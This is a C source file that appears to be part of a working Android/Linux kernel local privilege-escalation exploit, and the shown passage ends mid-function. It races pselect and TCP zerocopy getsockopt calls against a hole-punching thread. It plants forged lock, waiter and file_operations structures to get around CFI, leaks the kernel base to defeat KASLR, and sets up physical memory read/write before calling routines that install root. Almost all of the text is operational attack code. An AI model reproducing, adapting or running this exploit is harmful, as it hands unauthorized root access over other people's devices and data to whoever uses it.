#include "common.h"

#define PSELECT_CFI_ROUTE_ATTEMPTS 8
#define PSELECT_EXPECTED_READY 9
#define MAIN_TCP_PUNCH_SHMEM_LEN (16 * 1024 * 1024)
#define MAIN_TCP_ROUTE_ATTEMPTS_DEFAULT 2000
#define MAIN_TCP_ROUTE_ARM_SEQ_DEFAULT 16
#define MAIN_TCP_POST_GETSOCKOPT_HOLD_DEFAULT 20000
#define MAIN_TCP_PAGE_ATTEMPTS_DEFAULT 12
#define MAIN_TCP_CFI_ATTEMPTS_PER_PAGE_DEFAULT 1

#ifndef TCP_ZEROCOPY_RECEIVE
#define TCP_ZEROCOPY_RECEIVE 35
#endif

atomic_int cfi_stage_done;
ssize_t cfi_write_ret = -1;
ssize_t cfi_read_ret = -1;
ssize_t cfi_read_slot_ret = -1;
ssize_t cfi_owner_ret = -1;
ssize_t cfi_restore_ret = -1;
uint64_t fops_before;
uint64_t fops_after;
int cfi_attempts;
int pipe_stage_attempts;
int cfi_dirty_seen;
int cfi_last_step;
int cfi_last_errno;
int kaslr_done;
int kaslr_step;
uint64_t kaslr_fops_alias;
uint64_t kaslr_open_ptr;
uint64_t kaslr_ioctl_ptr;
uint64_t kaslr_mmap_ptr;
uint64_t kaslr_release_ptr;
uint64_t kaslr_show_fdinfo_ptr;
uint64_t kaslr_base;
uint64_t kaslr_slide;
uint64_t kaslr_expected_ioctl;
uint64_t kaslr_expected_mmap;
uint64_t kaslr_expected_release;
uint64_t kaslr_expected_show_fdinfo;
uint64_t slide_bootid_before;
uint64_t slide_bootid_after;
uint64_t slide_bootid_want;
ssize_t slide_bootid_restore_ret = -1;

struct main_tcp_punch_state {
  int fd;
  size_t page_size;
};

static atomic_int main_tcp_punch_go;
static atomic_int main_tcp_punch_stop;
static atomic_int main_tcp_punch_phase;

static int main_tcp_route_attempts(void) {
  return env_int_range("MAIN_TCP_ROUTE_ATTEMPTS",
                       MAIN_TCP_ROUTE_ATTEMPTS_DEFAULT, 1, 1000000);
}

static int main_tcp_route_arm_seq(void) {
  return env_int_range("MAIN_TCP_ROUTE_ARM_SEQ",
                       MAIN_TCP_ROUTE_ARM_SEQ_DEFAULT, 1, 1000000);
}

static int main_tcp_post_getsockopt_hold(void) {
  return env_int_range("MAIN_TCP_POST_GETSOCKOPT_HOLD",
                       MAIN_TCP_POST_GETSOCKOPT_HOLD_DEFAULT, 0, 1000000);
}

static int main_tcp_page_attempts(void) {
  return env_int_range("MAIN_TCP_PAGE_ATTEMPTS",
                       MAIN_TCP_PAGE_ATTEMPTS_DEFAULT, 1, 1000);
}

static int main_tcp_cfi_attempts_per_page(void) {
  return env_int_range("MAIN_TCP_CFI_ATTEMPTS_PER_PAGE",
                       MAIN_TCP_CFI_ATTEMPTS_PER_PAGE_DEFAULT, 1, 1000);
}

static int main_tcp_make_pair(int *client_fd, int *server_fd) {
  int listener = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, 0);
  if (listener < 0) {
    return -1;
  }

  int one = 1;
  setsockopt(listener, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));

  struct sockaddr_in addr;
  memset(&addr, 0, sizeof(addr));
  addr.sin_family = AF_INET;
  addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
  addr.sin_port = 0;

  if (bind(listener, (struct sockaddr *)&addr, sizeof(addr)) != 0 ||
      listen(listener, 1) != 0) {
    int saved = errno;
    close(listener);
    errno = saved;
    return -1;
  }

  socklen_t addr_len = sizeof(addr);
  if (getsockname(listener, (struct sockaddr *)&addr, &addr_len) != 0) {
    int saved = errno;
    close(listener);
    errno = saved;
    return -1;
  }

  *client_fd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, 0);
  if (*client_fd < 0) {
    int saved = errno;
    close(listener);
    errno = saved;
    return -1;
  }

  if (connect(*client_fd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
    int saved = errno;
    close(*client_fd);
    close(listener);
    errno = saved;
    return -1;
  }

  *server_fd = accept4(listener, NULL, NULL, SOCK_CLOEXEC);
  int saved = errno;
  close(listener);
  if (*server_fd < 0) {
    close(*client_fd);
    errno = saved;
    return -1;
  }
  return 0;
}

static void *main_tcp_punch_thread(void *arg) {
  disable_rseq_for_thread();

  struct main_tcp_punch_state *state = arg;
  while (!atomic_load(&main_tcp_punch_go) &&
         !atomic_load(&main_tcp_punch_stop)) {
    sched_yield();
  }

  while (!atomic_load(&main_tcp_punch_stop)) {
    if (fallocate(state->fd, 0, 0, MAIN_TCP_PUNCH_SHMEM_LEN) != 0) {
      pr_warning("main tcp punch fallocate errno=%d\n", errno);
      break;
    }
    atomic_store(&main_tcp_punch_phase, 1);
    if (fallocate(state->fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                  (off_t)state->page_size,
                  MAIN_TCP_PUNCH_SHMEM_LEN - state->page_size) != 0) {
      pr_warning("main tcp punch hole errno=%d\n", errno);
      break;
    }
    atomic_store(&main_tcp_punch_phase, 0);
  }
  return NULL;
}

static int route_delay_usec(int attempt) {
  int default_delay = pselect_custom_write_enabled() ? 0 : -1;
  int override = env_int_range("PSELECT_ROUTE_DELAY_USEC",
                               default_delay, -1, 1000000);
  if (override >= 0) {
    return override;
  }

  static const int delays[] = {
    50000, 30000, 70000, 10000, 100000, 150000, 20000, 120000,
  };

  int count = (int)(sizeof(delays) / sizeof(delays[0]));
  return delays[(attempt - 1) % count];
}

void fdset_put_word(fd_set *set, int word, uint64_t value) {
  unsigned long *bits = (unsigned long *)set;
  bits[word] = (unsigned long)value;
}

uint64_t fdset_get_word(const fd_set *set, int word) {
  const unsigned long *bits = (const unsigned long *)set;
  return bits[word];
}

static int pselect_words_per_set(void) {
  int bits_per_word = (int)(8 * sizeof(unsigned long));
  return (PSELECT_ROUTE_NFDS + bits_per_word - 1) / bits_per_word;
}

static int pselect_put_global_word(
    fd_set *in, fd_set *out, fd_set *ex, int words_per_set,
    int global_word, uint64_t value) {
  if (global_word < 0) {
    return 0;
  }

  int set_idx = global_word / words_per_set;
  int word_idx = global_word % words_per_set;
  switch (set_idx) {
    case 0:
      fdset_put_word(in, word_idx, value);
      return 1;
    case 1:
      fdset_put_word(out, word_idx, value);
      return 1;
    case 2:
      fdset_put_word(ex, word_idx, value);
      return 1;
    default:
      return 0;
  }
}

static void pselect_put_waiter_word(
    fd_set *in, fd_set *out, fd_set *ex, int words_per_set,
    int waiter_word, uint64_t value, const char *name) {
  int global_word = PSELECT_WAITER_WORD_SHIFT + waiter_word;
  int placed = pselect_put_global_word(
      in, out, ex, words_per_set, global_word, value);
  if (!placed) {
    pr_warning("pselect cannot place %s waiter_word=%d global_word=%d "
               "words_per_set=%d nfds=%d\n",
               name, waiter_word, global_word, words_per_set,
               PSELECT_ROUTE_NFDS);
  }
}

void open_selected_fds(
    fd_set *in, fd_set *out, fd_set *ex, int read_fd, int write_fd) {
  int high_write = fcntl(write_fd, F_DUPFD, PSELECT_ROUTE_NFDS + 32);
  if (high_write < 0) {
    pr_warning("pselect F_DUPFD write errno=%d\n", errno);
    return;
  }
  for (int fd = 0; fd < PSELECT_ROUTE_NFDS; fd++) {
    if (FD_ISSET(fd, in) || FD_ISSET(fd, out) || FD_ISSET(fd, ex)) {
      dup2(high_write, fd);
    }
  }
  close(high_write);
  dup2(read_fd, PSELECT_ROUTE_NFDS - 1);
  FD_SET(PSELECT_ROUTE_NFDS - 1, ex);
}

void prepare_pselect_fdsets(fd_set *in, fd_set *out, fd_set *ex) {
  FD_ZERO(in);
  FD_ZERO(out);
  FD_ZERO(ex);

  if (env_flag("PSELECT_SIMPLE_LAYOUT", 0)) {
    fdset_put_word(in, 0, fake_w0);
    fdset_put_word(in, 3, 0);
    fdset_put_word(ex, 0,
                   pselect_custom_write_enabled() ? fake_task :
                   text_addr(INIT_TASK));
    fdset_put_word(ex, 1, fake_lock);
    fdset_put_word(ex, 2, 3);
    fdset_put_word(ex, 3, 0);
    return;
  }

  int words_per_set = pselect_words_per_set();
  struct pselect_waiter_word {
    int word;
    uint64_t value;
    const char *name;
  } words[] = {
    {2, pselect_write_value(), "tree_pc"},
    {3, 0, "tree_right"},
    {4, pselect_write_target(), "tree_left"},
    {5, pselect_write_value(), "pi_parent"},
    {6, 0, "pi_right"},
    {7, pselect_write_target(), "pi_left"},
    {8, pselect_custom_write_enabled() ? fake_task : text_addr(INIT_TASK),
     "task"},
    {9, fake_lock, "lock"},
    {10, ((uint64_t)FAKE_WAITER_PRIO << 32) | 3, "wake_prio"},
    {11, 0, "deadline"},
    {12, 0, "ww_ctx"},
  };
  for (size_t i = 0; i < sizeof(words) / sizeof(words[0]); i++) {
    struct pselect_waiter_word *w = &words[i];
    pselect_put_waiter_word(
        in, out, ex, words_per_set, w->word, w->value, w->name);
  }
}

void do_pselect_fake_lock_route(void) {
  if (!page_base || !fake_lock || !fake_fops) {
    cfi_last_step = 30;
    cfi_last_errno = 0;
    pr_error("pselect route missing kernel page base=%016zx lock=%016zx fops=%016zx\n",
             page_base, fake_lock, fake_fops);
    return;
  }

  int calls = 0;
  int success = 0;
  int route_verified = 0;
  for (int route_attempt = 1; route_attempt <= PSELECT_CFI_ROUTE_ATTEMPTS;
       route_attempt++) {
    if (route_attempt != 1) {
      page_base = prepare_good_kernel_page(PAGE_PAYLOAD_FOPS);
      if (!page_base || !fake_lock || !fake_fops) {
        cfi_last_step = 34;
        cfi_last_errno = errno;
        pr_error("pselect retry page prepare failed attempt=%d base=%016zx "
                 "lock=%016zx fops=%016zx\n",
                 route_attempt, page_base, fake_lock, fake_fops);
        break;
      }
    }

    int pipefd[2];
    SYSCHK(pipe(pipefd));
    int block_fd = pipefd[0];
    int high_read = fcntl(block_fd, F_DUPFD, PSELECT_ROUTE_NFDS + 16);
    if (high_read < 0) {
      cfi_last_step = 31;
      cfi_last_errno = errno;
      pr_error("pselect F_DUPFD read errno=%d\n", errno);
      close(pipefd[0]);
      close(pipefd[1]);
      break;
    }

    fd_set in;
    fd_set out;
    fd_set ex;
    prepare_pselect_fdsets(&in, &out, &ex);
    pr_info("pselect route setup attempt=%d simple=%d page=%016zx "
            "fake_lock=%016zx fake_w0=%016zx fake_task=%016zx "
            "in0=%016llx in3=%016llx out0=%016llx ex0=%016llx "
            "ex1=%016llx ex2=%016llx ex3=%016llx\n",
            route_attempt,
            env_flag("PSELECT_SIMPLE_LAYOUT", 0),
            page_base, fake_lock, fake_w0, fake_task,
            (unsigned long long)fdset_get_word(&in, 0),
            (unsigned long long)fdset_get_word(&in, 3),
            (unsigned long long)fdset_get_word(&out, 0),
            (unsigned long long)fdset_get_word(&ex, 0),
            (unsigned long long)fdset_get_word(&ex, 1),
            (unsigned long long)fdset_get_word(&ex, 2),
            (unsigned long long)fdset_get_word(&ex, 3));
    open_selected_fds(&in, &out, &ex, high_read, pipefd[1]);

    atomic_store(&consumer_calls, 0);
    atomic_store(&consumer_success, 0);
    atomic_store(&punch_consume_stop, 0);
    int delay_usec = route_delay_usec(route_attempt);
    atomic_store(&main_route_delay_usec, delay_usec);
    atomic_store(&punch_consume_go, route_attempt);

    struct timespec timeout = {
      .tv_sec = PSELECT_TIMEOUT_SEC,
      .tv_nsec = 0,
    };
    struct timespec *timeoutp = &timeout;

    errno = 0;
    int ret = pselect(PSELECT_ROUTE_NFDS, &in, &out, &ex, timeoutp, NULL);
    int saved_errno = errno;
    atomic_store(&punch_consume_go, 0);
    int post_wait_usec = env_int_range(
        "PSELECT_POST_RESULT_WAIT_USEC", 0, 0, 1000000);
    if (post_wait_usec > 0) {
      int waited = 0;
      while (waited < post_wait_usec &&
             atomic_load(&consumer_calls) == 0 &&
             atomic_load(&consumer_success) == 0) {
        usleep(1000);
        waited += 1000;
      }
    }
    calls = atomic_load(&consumer_calls);
    success = atomic_load(&consumer_success);
    pr_info("pselect returned attempt=%d ret=%d errno=%d calls=%d success=%d delay=%d\n",
            route_attempt, ret, saved_errno, calls, success, delay_usec);

    int route_signal = calls > 0 && success > 0;
    int route_quality_miss = 0;
    int route_ready = ret == PSELECT_EXPECTED_READY ||
        env_flag("PSELECT_ACCEPT_NONREADY_CFI", 0);
    if (route_signal && route_ready) {
      if (pselect_custom_write_enabled()) {
        cfi_last_step = 0;
        cfi_last_errno = 0;
        route_verified = 1;
      } else if (try_cfi_stage()) {
        cfi_last_step = 0;
        route_verified = 1;
      } else if (!cfi_last_step) {
        cfi_last_step = 32;
      }
    } else if (route_signal) {
      route_quality_miss = 1;
      cfi_last_step = 35;
      cfi_last_errno = saved_errno;
      pr_info("pselect route quality miss attempt=%d/%d ret=%d expected=%d delay=%d; refreshing FOPS page\n",
              route_attempt, PSELECT_CFI_ROUTE_ATTEMPTS, ret,
              PSELECT_EXPECTED_READY, delay_usec);
    } else if (!route_verified) {
      cfi_last_step = 33;
      cfi_last_errno = saved_errno;
    }

    close(high_read);
    close(pipefd[0]);
    close(pipefd[1]);

    if (route_quality_miss) {
      continue;
    }
    if (route_verified || cfi_dirty_seen || cfi_last_step != 1) {
      break;
    }
    pr_info("pselect cfi write miss attempt=%d/%d errno=%d; refreshing FOPS page\n",
            route_attempt, PSELECT_CFI_ROUTE_ATTEMPTS, cfi_last_errno);
  }
  pr_info("pselect route done calls=%d success=%d step=%d errno=%d\n",
          calls, success, cfi_last_step, cfi_last_errno);
}

void do_tcp_fake_lock_route(void) {
  if (!page_base || !fake_lock || !fake_fops) {
    cfi_last_step = 20;
    cfi_last_errno = 0;
    pr_error("main tcp route missing page=%016zx lock=%016zx fops=%016zx\n",
             page_base, fake_lock, fake_fops);
    return;
  }

  int client_fd = -1;
  int server_fd = -1;
  int punch_fd = -1;
  char *map = MAP_FAILED;
  pthread_t puncher;
  int puncher_started = 0;
  int route_ok = 0;

  if (main_tcp_make_pair(&client_fd, &server_fd) != 0) {
    cfi_last_step = 21;
    cfi_last_errno = errno;
    pr_error("main tcp route setup failed errno=%d\n", errno);
    return;
  }

  size_t page_size = (size_t)sysconf(_SC_PAGESIZE);
  punch_fd = (int)syscall(SYS_memfd_create, "main-tcp-punch", MFD_CLOEXEC);
  if (punch_fd < 0) {
    cfi_last_step = 22;
    cfi_last_errno = errno;
    pr_error("main tcp memfd_create errno=%d\n", errno);
    goto out;
  }
  if (fallocate(punch_fd, 0, 0, MAIN_TCP_PUNCH_SHMEM_LEN) != 0) {
    cfi_last_step = 23;
    cfi_last_errno = errno;
    pr_error("main tcp fallocate errno=%d\n", errno);
    goto out;
  }

  map = mmap(NULL, MAIN_TCP_PUNCH_SHMEM_LEN, PROT_READ | PROT_WRITE,
             MAP_SHARED, punch_fd, 0);
  if (map == MAP_FAILED) {
    cfi_last_step = 24;
    cfi_last_errno = errno;
    pr_error("main tcp mmap errno=%d\n", errno);
    goto out;
  }
  for (size_t off = 0; off < MAIN_TCP_PUNCH_SHMEM_LEN; off += page_size) {
    map[off] = 0x55;
  }

  struct main_tcp_punch_state state = {
    .fd = punch_fd,
    .page_size = page_size,
  };
  if (pthread_create(&puncher, NULL, main_tcp_punch_thread, &state) != 0) {
    cfi_last_step = 25;
    cfi_last_errno = errno;
    pr_error("main tcp punch thread errno=%d\n", errno);
    goto out;
  }
  puncher_started = 1;

  int route_attempts = main_tcp_route_attempts();
  int arm_seq = main_tcp_route_arm_seq();
  int post_hold = main_tcp_post_getsockopt_hold();
  int page_attempts = main_tcp_page_attempts();
  int cfi_attempts_per_page = main_tcp_cfi_attempts_per_page();
  uintptr_t waiter_task =
      (env_flag("MAIN_TCP_PAYLOAD", 1) ||
       env_flag("MAIN_TCP_TASK_SLIDE_INIT", 0)) ?
      SLIDE_INIT_TASK : text_addr(INIT_TASK);

  pr_info("main tcp route enter page=%016zx fake_lock=%016zx fake_w0=%016zx "
          "fake_fops=%016zx task=%016zx attempts=%d pages=%d arm=%d hold=%d\n",
          page_base, fake_lock, fake_w0, fake_fops, waiter_task,
          route_attempts, page_attempts, arm_seq, post_hold);

  atomic_store(&main_tcp_punch_stop, 0);
  atomic_store(&main_tcp_punch_phase, 0);
  atomic_store(&main_tcp_punch_go, 1);
  atomic_store(&punch_consume_stop, 0);
  atomic_store(&punch_consume_go, 0);
  atomic_store(&consumer_calls, 0);
  atomic_store(&consumer_success, 0);
  atomic_store(&main_route_delay_usec,
               env_int_range("MAIN_TCP_ROUTE_DELAY_USEC", 0, 0, 1000000));

  char sendbuf[64];
  memset(sendbuf, 0x33, sizeof(sendbuf));

  for (int page_attempt = 1; page_attempt <= page_attempts; page_attempt++) {
    int cfi_misses = 0;
    if (page_attempt != 1) {
      page_base = prepare_good_kernel_page(PAGE_PAYLOAD_FOPS);
      if (!page_base || !fake_lock || !fake_fops) {
        cfi_last_step = 26;
        cfi_last_errno = errno;
        pr_error("main tcp page refresh failed page_attempt=%d base=%016zx "
                 "lock=%016zx fops=%016zx\n",
                 page_attempt, page_base, fake_lock, fake_fops);
        break;
      }
      waiter_task =
          (env_flag("MAIN_TCP_PAYLOAD", 1) ||
           env_flag("MAIN_TCP_TASK_SLIDE_INIT", 0)) ?
          SLIDE_INIT_TASK : text_addr(INIT_TASK);
      pr_info("main tcp page refresh %d base=%016zx fake_lock=%016zx "
              "fake_fops=%016zx\n",
              page_attempt, page_base, fake_lock, fake_fops);
    }

    for (int i = 1; i <= route_attempts; i++) {
      int calls_before = atomic_load(&consumer_calls);
      int success_before = atomic_load(&consumer_success);
      (void)send(server_fd, sendbuf, sizeof(sendbuf), MSG_DONTWAIT);
      while (atomic_load(&main_tcp_punch_phase)) {
        sched_yield();
      }
      for (int spin = 0; !atomic_load(&main_tcp_punch_phase) &&
           spin < 10000000; spin++) {
        __asm__ volatile("yield" ::: "memory");
      }

      unsigned char zc[0x40];
      memset(zc, 0, sizeof(zc));
      put64(zc, 0x18, (uint64_t)(uintptr_t)(map + page_size));
      put32(zc, 0x20, sizeof(sendbuf));
      put64(zc, 0x28, waiter_task);
      put64(zc, 0x30, fake_lock);

      if (i >= arm_seq) {
        atomic_store(&punch_consume_go, i);
      }
      socklen_t len = sizeof(zc);
      errno = 0;
      int ret = getsockopt(client_fd, IPPROTO_TCP, TCP_ZEROCOPY_RECEIVE, zc,
                           &len);
      int saved_errno = errno;
      if (i >= arm_seq) {
        for (int spin = 0; spin < post_hold; spin++) {
          __asm__ volatile("yield" ::: "memory");
        }
        wait_for_consumer_idle();
      }

      int calls = atomic_load(&consumer_calls);
      int success = atomic_load(&consumer_success);
      if (calls <= calls_before || success <= success_before) {
        if (env_flag("MAIN_TCP_LOG_EACH", 0) || (i % 100) == 0 || ret != 0) {
          pr_info("main tcp route page=%d/%d seq=%d ret=%d errno=%d len=%u "
                  "calls=%d success=%d\n",
                  page_attempt, page_attempts, i, ret, saved_errno, len,
                  calls, success);
        }
        continue;
      }

      if (run_cfi_stage_on_worker()) {
        pr_info("main tcp route page=%d/%d seq=%d ret=%d errno=%d len=%u "
                "calls=%d success=%d\n",
                page_attempt, page_attempts, i, ret, saved_errno, len,
                calls, success);
        route_ok = 1;
        break;
      }
      if (env_flag("MAIN_TCP_RETRY_PIPE_GEOM", 0) &&
          cfi_last_step == 8 && page_attempt < page_attempts) {
        pr_info("main tcp pipe stage exhausted page=%d/%d; refresh "
                "cfi/pipe geometry\n",
                page_attempt, page_attempts);
        reset_pipe_attempt();
        cfi_dirty_seen = 0;
        break;
      }
      if (cfi_dirty_seen) {
        break;
      }
      cfi_misses++;
      if (cfi_misses >= cfi_attempts_per_page) {
        pr_info("main tcp route page=%d cfi misses=%d refresh\n",
                page_attempt, cfi_misses);
        break;
      }
    }

    if (route_ok || cfi_dirty_seen) {
      break;
    }
  }

out:
  atomic_store(&punch_consume_go, 0);
  atomic_store(&punch_consume_stop, 1);
  atomic_store(&main_tcp_punch_go, 0);
  atomic_store(&main_tcp_punch_stop, 1);
  if (puncher_started) {
    SYSCHK(pthread_join(puncher, NULL));
  }
  if (map != MAP_FAILED) {
    SYSCHK(munmap(map, MAIN_TCP_PUNCH_SHMEM_LEN));
  }
  if (punch_fd >= 0) {
    SYSCHK(close(punch_fd));
  }
  if (server_fd >= 0) {
    SYSCHK(close(server_fd));
  }
  if (client_fd >= 0) {
    SYSCHK(close(client_fd));
  }
  pr_info("main tcp route done=%d calls=%d success=%d step=%d errno=%d\n",
          route_ok, atomic_load(&consumer_calls),
          atomic_load(&consumer_success), cfi_last_step, cfi_last_errno);
}

int repair_fake_fops_llseek(int fd) {
  uint64_t llseek = text_addr(NOOP_LLSEEK);
  uint64_t after = 0;
  uintptr_t slot = fake_fops + FOPS_LLSEEK_OFF;
  ssize_t wr = configfs_write_once(fd, slot, &llseek, sizeof(llseek));
  ssize_t rd = configfs_read_once(fd, slot, &after, sizeof(after));
  return wr == (ssize_t)sizeof(llseek) &&
         rd == (ssize_t)sizeof(after) &&
         after == llseek;
}

int refresh_fake_fops_text(int fd) {
  struct fops_slot {
    size_t off;
    uint64_t value;
  } slots[] = {
    {FOPS_READ_ITER_OFF, text_addr(CONFIGFS_READ_ITER)},
    {FOPS_WRITE_ITER_OFF, text_addr(CONFIGFS_BIN_WRITE_ITER)},
    {FOPS_IOCTL_OFF, text_addr(ASHMEM_IOCTL)},
    {FOPS_COMPAT_IOCTL_OFF, text_addr(ASHMEM_COMPAT_IOCTL)},
    {FOPS_MMAP_OFF, text_addr(ASHMEM_MMAP)},
    {FOPS_OPEN_OFF, text_addr(ASHMEM_OPEN)},
    {FOPS_RELEASE_OFF, text_addr(ASHMEM_RELEASE)},
    {FOPS_SPLICE_READ_OFF, text_addr(COPY_SPLICE_READ)},
    {FOPS_SHOW_FDINFO_OFF, text_addr(ASHMEM_SHOW_FDINFO)},
  };

  for (size_t i = 0; i < sizeof(slots) / sizeof(slots[0]); i++) {
    uintptr_t target = fake_fops + slots[i].off;
    if (kernel_write_data(fd, target, &slots[i].value,
        sizeof(slots[i].value)) !=
        (ssize_t)sizeof(slots[i].value)) {
      return 0;
    }
  }
  return 1;
}

int leak_kernel_base(int fd) {
  kaslr_fops_alias = p0_data_alias(ASHMEM_FOPS);
  kaslr_open_ptr = kernel_read64(fd, kaslr_fops_alias + FOPS_OPEN_OFF);
  kaslr_ioctl_ptr = kernel_read64(fd, kaslr_fops_alias + FOPS_IOCTL_OFF);
  kaslr_mmap_ptr = kernel_read64(fd, kaslr_fops_alias + FOPS_MMAP_OFF);
  kaslr_release_ptr = kernel_read64(fd, kaslr_fops_alias + FOPS_RELEASE_OFF);
  kaslr_show_fdinfo_ptr =
    kernel_read64(fd, kaslr_fops_alias + FOPS_SHOW_FDINFO_OFF);

  if (!is_kernel_ptr(kaslr_open_ptr) || !is_kernel_ptr(kaslr_ioctl_ptr) ||
      !is_kernel_ptr(kaslr_mmap_ptr) || !is_kernel_ptr(kaslr_release_ptr) ||
      !is_kernel_ptr(kaslr_show_fdinfo_ptr)) {
    kaslr_step = 1;
    return 0;
  }

  kaslr_base = kaslr_open_ptr - (ASHMEM_OPEN - KIMAGE_TEXT_BASE);
  kaslr_slide = kaslr_base - KIMAGE_TEXT_BASE;
  kaslr_done = 1;
  kaslr_expected_ioctl = text_addr(ASHMEM_IOCTL);
  kaslr_expected_mmap = text_addr(ASHMEM_MMAP);
  kaslr_expected_release = text_addr(ASHMEM_RELEASE);
  kaslr_expected_show_fdinfo = text_addr(ASHMEM_SHOW_FDINFO);

  if (kaslr_ioctl_ptr != kaslr_expected_ioctl ||
      kaslr_mmap_ptr != kaslr_expected_mmap ||
      kaslr_release_ptr != kaslr_expected_release ||
      kaslr_show_fdinfo_ptr != kaslr_expected_show_fdinfo) {
    kaslr_done = 0;
    kaslr_step = 2;
    return 0;
  }

  if (!refresh_fake_fops_text(fd)) {
    kaslr_done = 0;
    kaslr_step = 3;
    return 0;
  }

  kaslr_step = 0;
  return 1;
}

int restore_slide_boot_id(int fd) {
  uintptr_t boot_id_data = SLIDE_RANDOM_BOOT_ID_DATA;
  slide_bootid_want = slide_canon_addr(SLIDE_SYSCTL_BOOTID);
  configfs_read_once(
      fd, boot_id_data, &slide_bootid_before, sizeof(slide_bootid_before));
  slide_bootid_restore_ret =
    configfs_write_once(
        fd, boot_id_data, &slide_bootid_want, sizeof(slide_bootid_want));
  configfs_read_once(
      fd, boot_id_data, &slide_bootid_after, sizeof(slide_bootid_after));
  pr_info("slide restore boot_id data pid=%d ret=%zd before=%016llx "
          "want=%016llx after=%016llx errno=%d\n",
          getpid(), slide_bootid_restore_ret,
          (unsigned long long)slide_bootid_before,
          (unsigned long long)slide_bootid_want,
          (unsigned long long)slide_bootid_after, errno);
  return slide_bootid_restore_ret == (ssize_t)sizeof(slide_bootid_want) &&
         slide_bootid_after == slide_bootid_want;
}

int install_child_root(int fd) {
  if (env_flag("DIRECT_CONFIGFS_ROOT", 0)) {
    pr_info("direct configfs root cannot clean the waiter PI state\n");
    return 0;
  }
  return install_pipe_physrw(fd) && cleanup_main_waiter_pi_state(fd) &&
         install_android_root(fd);
}

int try_cfi_stage(void) {
  cfi_attempts++;
  int fd = open_ashmem_device();
  int dirty = 0;
  int can_read_back = 0;

  if (fd < 0) {
    cfi_last_step = 11;
    cfi_last_errno = errno;
    pr_info("cfi open failed path=%s errno=%d\n", ashmem_path, errno);
    return 0;
  }

  pr_info("cfi attempt=%d fd=%d path=%s fake_fops=%016zx target=%016zx "
          "ioctl=%016llx open=%016llx write_iter=%016llx\n",
          cfi_attempts, fd, ashmem_path, fake_fops, binwrite_target,
          (unsigned long long)text_addr(ASHMEM_IOCTL),
          (unsigned long long)text_addr(ASHMEM_OPEN),
          (unsigned long long)text_addr(CONFIGFS_BIN_WRITE_ITER));

  uintptr_t misc_fops = data_addr(ASHMEM_MISC_FOPS);
  char payload[] = "CFI_FRIENDLY_CONFIGFS_BIN_WRITE_OK";
  ssize_t n =
    configfs_write_once(fd, binwrite_target, payload, sizeof(payload));
  cfi_write_ret = n;
  pr_info("cfi write ret=%zd errno=%d\n", n, errno);
  if (n != (ssize_t)sizeof(payload)) {
    cfi_last_step = 1;
    cfi_last_errno = errno;
    goto fail;
  }
  dirty = 1;
  cfi_dirty_seen = 1;

  if (env_flag("MAIN_TCP_PAYLOAD", 1)) {
    uint64_t read_slot = 0;
    cfi_read_slot_ret = configfs_write_once(
        fd, fake_fops + FOPS_READ_OFF, &read_slot, sizeof(read_slot));
    pr_info("cfi readslot ret=%zd errno=%d\n", cfi_read_slot_ret, errno);
    if (cfi_read_slot_ret != (ssize_t)sizeof(read_slot)) {
      cfi_last_step = 2;
      cfi_last_errno = errno;
      goto fail;
    }
  } else if (!repair_fake_fops_llseek(fd)) {
    cfi_last_step = 2;
    cfi_last_errno = errno;
    goto fail;
  } else {
    cfi_read_slot_ret = sizeof(uint64_t);
  }
  can_read_back = 1;

  char readback[sizeof(payload)];
  memset(readback, 0, sizeof(readback));
  ssize_t r =
    configfs_read_once(fd, binwrite_target, readback, sizeof(readback));
  cfi_read_ret = r;
  pr_info("cfi read ret=%zd errno=%d\n", r, errno);
  if (r != (ssize_t)sizeof(readback) ||
      memcmp(readback, payload, sizeof(payload)) != 0) {
    cfi_last_step = 3;
    cfi_last_errno = errno;
    goto fail;
  }

  uint64_t before = 0;
  ssize_t rb = configfs_read_once(fd, misc_fops, &before, sizeof(before));
  fops_before = before;
  pr_info("cfi fops_before ret=%zd value=%016llx want=%016zx errno=%d\n",
          rb, (unsigned long long)before, fake_fops, errno);
  if (rb != (ssize_t)sizeof(before) || before != fake_fops) {
    cfi_last_step = 4;
    cfi_last_errno = errno;
    goto fail;
  }

  if (!restore_slide_boot_id(fd)) {
    cfi_last_step = 10;
    cfi_last_errno = errno;
    goto fail;
  }

  if (!leak_kernel_base(fd)) {
    cfi_last_step = 9;
    cfi_last_errno = errno;
    goto fail;
  }

  int installed = 0;
  pipe_stage_attempts = 0;
  int pipe_max_attempts =
    env_int_range("PIPE_STAGE_ATTEMPTS", 72, 1, 200);
  int pipe_between_attempt_usec =
    env_int_range("PIPE_BETWEEN_ATTEMPT_USEC", 0, 0, 1000000);
  for (int attempt = 0; attempt < pipe_max_attempts; attempt++) {
    pipe_stage_attempts++;
    pr_info("pipe stage attempt=%d/%d\n", pipe_stage_attempts,
            pipe_max_attempts);
    if (attempt != 0) {
      reset_pipe_attempt();
    }
    int install_ok = install_child_root(fd);
    pr_info("pipe stage attempt=%d install_ok=%d cache_gate=%d read=%d "
            "write=%d rw64=%d/%d errno=%d\n",
            pipe_stage_attempts, install_ok, pipe_cache_gate_ok,
            physrw_read_ok, physrw_write_ok, physrw_read64_ok,
            physrw_write64_ok, errno);
    if (install_ok) {
      installed = 1;
      break;
    }
    if (pipe_cache_gate_ok == 1 && physrw_read_ok && physrw_write_ok &&
        physrw_read64_ok && physrw_write64_ok) {
      break;
    }
    if (pipe_between_attempt_usec > 0 && attempt + 1 < pipe_max_attempts) {
      pr_info("pipe stage cool down usec=%d before retry\n",
              pipe_between_attempt_usec);
      usleep((useconds_t)pipe_between_attempt_usec);
    }
  }

  if (!installed) {
    cfi_last_step = 8;
    cfi_last_errno = errno;
    goto fail;
  }

  uint64_t original_fops = canon_addr(ASHMEM_FOPS);
  ssize_t restore = configfs_write_once(
      fd, misc_fops, &original_fops, sizeof(original_fops));
  cfi_restore_ret = restore;
  if (restore != (ssize_t)sizeof(original_fops)) {
    cfi_last_step = 5;
    cfi_last_errno = errno;
    goto fail;
  }

  uint64_t after = 0;
  ssize_t ra = configfs_read_once(fd, misc_fops, &after, sizeof(after));
  fops_after = after;
  if (ra != (ssize_t)sizeof(after) || after != canon_addr(ASHMEM_FOPS)) {
    cfi_last_step = 6;
    cfi_last_errno = errno;
    goto fail;
  }

  uint64_t null_owner = 0;
  ssize_t owner =
    configfs_write_once(fd, fake_fops, &null_owner, sizeof(null_owner));
